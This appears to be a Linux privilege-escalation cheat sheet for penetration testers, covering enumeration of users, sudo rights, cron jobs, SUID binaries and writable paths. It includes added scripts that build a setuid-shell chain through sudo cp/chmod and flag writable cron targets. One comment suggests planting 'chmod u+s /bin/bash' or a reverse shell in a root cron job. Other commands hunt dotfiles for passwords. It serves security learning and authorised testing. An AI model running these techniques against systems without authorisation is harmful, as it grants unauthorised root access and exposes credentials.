# Linux Privilege Escalation

## Basic Linux Privilege Escalation

<https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/>

## Automated Enumeration

```
git clone https://github.com/rebootuser/LinEnum.git

./LinEnum.sh
```

```
git clone https://github.com/diego-treitos/linux-smart-enumeration
```

```
git clone https://github.com/pentestmonkey/unix-privesc-check.git

./unix-privesc-check
./unix-privesc-check standard > output.txt
```

## Information Gathering

1. What's the OS? What version? What architecture?

   ```bash
   cat /etc/issue
   cat /etc/*-release
   uname -i          # hardware platform; prints "unknown" on many distros, then use uname -m
   lsb_release -a    # Debian-based OSs
   ```
2. Who are we? Where are we?

   ```bash
   id
   whoami
   pwd
   ```
3. Who uses the box? What users? (And which ones have a valid shell)

   ```bash
   cat /etc/passwd
   # test the shell field only; a bare grep -v also drops lines with "false"/"nologin" anywhere in them
   awk -F: '$7 !~ /(nologin|false)$/' /etc/passwd
   ```
4. What's currently running on the box? What active network services are there?

   ```bash
   ps aux
   netstat -antup    # or ss -antup on systems that no longer ship netstat
   ```
5. What's installed? What kernel is being used?

   ```bash
   dpkg -l     # Debian-based OSs
   rpm -qa     # CentOS / openSUSE
   uname -a
   ```
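Pulling steps 2 and 3 together: the script below is an added example (not part of the original page) that triages a passwd file for the three things worth acting on, accounts that can actually log in, any second uid-0 account (a classic backdoor), and an empty password field (a `su` that asks for nothing). It takes the file path as an argument so it also works on a `passwd.bak` pulled from a backup directory; the function names and that path are assumptions.

```bash
#!/bin/sh
# Added example (not from the original page): triage a passwd file for the
# "who uses the box?" step. $1 is the passwd path, default /etc/passwd, so the
# same functions run against a copied file (e.g. a passwd.bak found in a backup).

# Accounts whose login shell is real (field 7 not nologin/false): "user:uid:shell".
login_shell_users() {
  awk -F: '$7 !~ /(nologin|false)$/ { print $1 ":" $3 ":" $7 }' "${1:-/etc/passwd}"
}

# Accounts with uid 0 other than root. A second uid-0 user is a backdoor account.
extra_uid0_users() {
  awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# Accounts whose password field is empty: "su <user>" needs no password at all.
# (Normally the field is "x", meaning the hash lives in /etc/shadow.)
empty_password_users() {
  awk -F: '$2 == "" { print $1 }' "${1:-/etc/passwd}"
}

# Run all three checks against one file with labelled output.
passwd_triage() {
  f="${1:-/etc/passwd}"
  echo "[*] accounts with a login shell (user:uid:shell):"; login_shell_users "$f"
  echo "[*] extra uid-0 accounts:";                         extra_uid0_users "$f"
  echo "[*] accounts with an empty password field:";        empty_password_users "$f"
}

# passwd_triage                 # live system
# passwd_triage /backup/passwd.bak  # a copy found elsewhere (hypothetical path)
```

An empty second field only matters if the system actually consults /etc/passwd for the hash; on a shadow-enabled system it usually means the account was created with a broken tool, which is still worth a `su` attempt.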

## Check sudo access

[https://gtfobins.github.io](https://gtfobins.github.io/)

```
$ sudo -l
[sudo] password for Hades:
Matching Defaults entries for Hades on 7358cafc3ebe:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User Hades may run the following commands:
    (victim) /bin/bash
```

### Mix cp/chown and chmod

<https://www.adampalmer.me/iodigitalsec/2009/10/03/linux-c-setuid-setgid-tutorial/>

<https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/>

```
sudo -l
Matching Defaults entries for Hades:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User Hades may run the following commands:
    (victim) /bin/chmod, /bin/cp
```
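What to do with the two `sudo -l` results above. `(victim) /bin/bash` is simply `sudo -u victim /bin/bash`. `(victim) /bin/chmod, /bin/cp` needs the chain the two links describe: copy a shell as victim (so victim owns the copy), set the setuid bit on it, then run the copy. The script below is an added example, not code from this page or from the linked articles: `parse_sudo_l` turns `sudo -l` output into one runas/command pair per line (handling `NOPASSWD:`-style tags and command lists wrapped over several lines), and `suid_shell_chain` prints the three commands for a given runas user. The function names and the `/tmp` destination are assumptions.

```bash
#!/bin/sh
# Added example (not code from the original page): parse `sudo -l` output into
# "runas<TAB>command" lines, then build the cp/chmod SUID-shell chain for a runas user.
# Usage: sudo -l 2>/dev/null | parse_sudo_l
parse_sudo_l() {
  awk '
    # print one "runas<TAB>command" line per comma-separated command in list
    function emit(list,    n, i, c) {
      sub(/^[[:space:]]+/, "", list); sub(/[[:space:]]+$/, "", list); sub(/,$/, "", list)
      n = split(list, c, /,[[:space:]]*/)
      for (i = 1; i <= n; i++) if (c[i] != "") print runas "\t" c[i]
    }
    /may run the following commands/ { in_cmds = 1; next }
    # entry line: "(runas) [TAG:]... cmd1, cmd2"
    in_cmds && /^[[:space:]]*\(/ {
      match($0, /\([^)]*\)/)
      runas = substr($0, RSTART + 1, RLENGTH - 2)
      rest  = substr($0, RSTART + RLENGTH)
      # strip tags such as NOPASSWD: or SETENV: that precede the command list
      while (match(rest, /^[[:space:]]*[A-Z_]+:/)) rest = substr(rest, RSTART + RLENGTH)
      emit(rest); next
    }
    # long command lists wrap onto indented continuation lines without a "(runas)"
    in_cmds && runas != "" && /^[[:space:]]+[^[:space:](]/ { emit($0) }
  '
}

# For "(victim) /bin/chmod, /bin/cp": print the commands that give a shell running as
# victim. cp runs as victim, so the copy is owned by victim; chmod u+s as victim then
# makes it setuid-victim; bash must be started with -p or it drops the effective uid
# back to ours at startup. $2 is the destination (assumed /tmp/.<runas>_sh by default).
suid_shell_chain() {
  runas="$1"; dest="${2:-/tmp/.${1}_sh}"
  printf 'sudo -u %s /bin/cp /bin/bash %s\n' "$runas" "$dest"
  printf 'sudo -u %s /bin/chmod u+s %s\n' "$runas" "$dest"
  printf '%s -p\n' "$dest"
}

# sudo -l 2>/dev/null | parse_sudo_l            # one "runas<TAB>command" per line
# suid_shell_chain victim                        # then run the three printed commands
```

Two caveats. The `-p` is not optional: bash compares real and effective uid at startup and drops privileges unless told to keep them. And the copy must sit on a filesystem mounted without `nosuid` (`mount | grep nosuid`; `/tmp` and `/dev/shm` frequently are), otherwise the setuid bit is ignored. If the runas is `root`, the same chain yields a root shell; if the copied shell is something other than bash, check its own rule for dropping privileges.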

## Check Scheduled Tasks

<https://github.com/DominicBreuker/pspy> (snoops on process starts without root, so cron jobs show up as they fire, including ones you cannot read the crontab for)

```
ls -lah /etc/cron*
cat /etc/crontab
```
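Listing the crontabs only tells you what runs; the question is whether you can change it. The script below is an added example (not from the page) that walks a system-format crontab (`/etc/crontab` and the files in `/etc/cron.d/`, which carry a user field) and flags each command path that is writable by you, or whose directory is writable so the file can be swapped. The function name and the sample crontab in the usage comment are assumptions.

```bash
#!/bin/sh
# Added example (not code from the original page): flag cron entries whose command
# is a path the current user can write, or whose directory is writable (the file can
# then be replaced). A writable script run by root's cron is a direct privesc: append
# "chmod u+s /bin/bash" (or a reverse shell) and wait for the next run.
# Handles the system crontab layout (m h dom mon dow user command) used by
# /etc/crontab and /etc/cron.d/*, including @reboot-style entries.
# Usage: writable_cron_targets                                 # /etc/crontab
#        for f in /etc/cron.d/*; do writable_cron_targets "$f"; done
writable_cron_targets() {
  crontab_file="${1:-/etc/crontab}"
  [ -r "$crontab_file" ] || return 0
  # skip blank lines, comments and VAR=value lines
  grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' "$crontab_file" |
  while read -r f1 f2 f3 f4 f5 f6 rest; do
    case "$f1" in
      @*) user="$f2"; cmd="$f3 $f4 $f5 $f6 $rest" ;;   # @reboot user command
      *)  user="$f6"; cmd="$rest" ;;                    # five time fields, user, command
    esac
    set -f                      # no globbing while the command is split on whitespace
    for tok in $cmd; do
      case "$tok" in
        /*)
          if [ -w "$tok" ]; then
            printf '%s\t%s\twritable\n' "$user" "$tok"
          elif [ -d "${tok%/*}" ] && [ -w "${tok%/*}" ]; then
            printf '%s\t%s\tdirectory writable\n' "$user" "$tok"
          fi ;;
      esac
    done
    set +f
  done
}
```

Per-user crontabs (`crontab -l`, `/var/spool/cron/crontabs/*`) have no user field and are not handled here; for those, pspy tells you who the job runs as. Also check the entries that call an interpreter (`/bin/sh /opt/x.sh`, `python3 /opt/y.py`): the script path is a later token, which is why every absolute-path token is tested rather than only the first.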

## Readable/Writable Files and Directories

```
find / -writable -type d 2>/dev/null
```

## Check history, bashrc, backup

```
find / -name "*history*" 2>/dev/null
find / -name "*bashrc*" -exec grep -i passw {} \; 2>/dev/null
```

## Binaries That AutoElevate

```
find / -perm -u=s -type f 2>/dev/null
```
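The `find` above returns dozens of hits on any stock system, and the interesting ones are the few that are not supposed to be there. The filter below is an added example (not from the page): it reads `find` output and prints only binaries whose name is not in a baseline of SUID binaries commonly found on Debian/Ubuntu installs, plus any baseline name living outside the usual bin directories. The baseline is illustrative, not authoritative, and the function name is an assumption; what it prints is the shortlist to look up on GTFOBins.

```bash
#!/bin/sh
# Added example (not code from the original page): reduce SUID enumeration output to
# the binaries worth looking at. STOCK_SUID is an illustrative list of SUID binaries
# commonly present on Debian/Ubuntu systems, not an authoritative inventory.
# Usage: find / -perm -4000 -type f 2>/dev/null | nonstandard_suid
STOCK_SUID="passwd su sudo mount umount chsh chfn newgrp gpasswd ping ping6 pkexec fusermount fusermount3 ntfs-3g chage expiry at crontab ssh-keysign dbus-daemon-launch-helper polkit-agent-helper-1 pppd Xorg"

nonstandard_suid() {
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    name=${path##*/}
    case " $STOCK_SUID " in
      *" $name "*)
        # a stock name outside the usual bin/lib directories is still suspicious
        # (e.g. a copy of passwd or su planted in /tmp or a home directory)
        case "$path" in
          /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*|/usr/lib/*|/usr/libexec/*) ;;
          *) printf '%s\tstock name, unusual path\n' "$path" ;;
        esac ;;
      *) printf '%s\tnot in baseline\n' "$path" ;;
    esac
  done
}
```

`-perm -4000` is the numeric form of `-perm -u=s`; add `-perm -2000` (or `-g=s`) for SGID binaries, which the same filter handles. Once you have the shortlist, `ls -l` each path: a SUID copy of a stock binary that is out of date, or a custom binary owned by root, is where you spend time.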

## Unmounted Disks

```
cat /etc/fstab
/bin/lsblk
mount
```

## Loaded Kernel Modules

```
lsmod
/sbin/modinfo libata
```


